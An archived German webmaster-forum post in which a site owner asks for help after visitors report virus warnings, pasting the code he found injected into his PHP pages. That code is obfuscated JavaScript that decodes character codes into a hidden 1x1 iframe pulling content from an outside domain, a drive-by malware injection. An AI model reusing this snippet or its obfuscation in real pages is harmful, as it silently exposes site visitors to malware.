Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

Seite gehackt??

Ajax, Hijax, Microformats, RDF, Markup, HTML, PHP, CSS, MySQL, htaccess, robots.txt, CGI, Java, Javascript usw.
Neues Thema Antworten
stp69
PostRank 7
PostRank 7
Beiträge: 499
Registriert: 20.02.2004, 14:54

Beitrag von stp69 » 04.08.2006, 13:58

Moin zusammen,

ich habe in php ein kleines Projekt zusammen kopiert und auch darin eine superclix Shoplösung eingebunden. Nichts wildes ein wenig php, etwas html und fertig. Neulich bekomme ich von den Besuchern Infos das die Seite beim Aufruf eine Virenwarnung hervorruft. Ich hab mir die Seiten angesehen und auf der index.php und der index2.php folgenden Code gefunden, der nicht von mir stammt.

Code: Alles auswählen

<SCRIPT LANGUAGE="JavaScript">
<!--
function Decode&#40;&#41;&#123;var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!104!116!116!112!58!47!47!120!45!114!111!97!100!46!99!111!46!107!114!47!114!105!99!104!47!111!117!116!46!112!104!112!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!62!60!47!105!102!114!97!109!101!62!";l=str.length;while&#40;c<=str.length-1&#41;&#123;while&#40;str.charAt&#40;c&#41;!='!'&#41;temp=temp+str.charAt&#40;c++&#41;;c++;out=out+String.fromCharCode&#40;temp&#41;;temp="";&#125;document.write&#40;out&#41;;&#125;
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode&#40;&#41;;
//-->
</SCRIPT>
Der Schnipsel wurde einmal wiederholt.

Ich hab das noch nie gesehen und mich würde mal interesieren was das ist, wo es herkommt und was ich dagegen machen kann. Ich hab nun die Dateien von chmod 644 auf 444 geändert...

Gruß
Stp